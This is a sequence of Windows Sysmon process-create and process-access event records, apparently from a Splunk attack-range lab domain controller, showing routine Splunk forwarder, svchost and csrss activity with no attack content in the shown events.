{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3821,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.533\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0243-5F25-0000-0010A1CB0500}\r\nTargetProcessId: 756\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.533","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0243-5F25-0000-0010A1CB0500}","TargetProcessId":"756","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3822,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.206\r\nProcessGuid: {A837DB8D-0244-5F25-0000-001063CD0500}\r\nProcessId: 4124\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Performance monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-perfmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.206","ProcessGuid":"{A837DB8D-0244-5F25-0000-001063CD0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","FileVersion":"8.0.2","Description":"Performance monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-perfmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3823,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.205\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0244-5F25-0000-001063CD0500}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.205","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0244-5F25-0000-001063CD0500}","TargetProcessId":"4124","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3824,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.205\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0244-5F25-0000-001063CD0500}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.205","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0244-5F25-0000-001063CD0500}","TargetProcessId":"4124","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3825,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.205\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.205","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3826,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.205\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.205","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3827,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.205\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.205","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3828,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.205\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.205","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3829,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.205\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 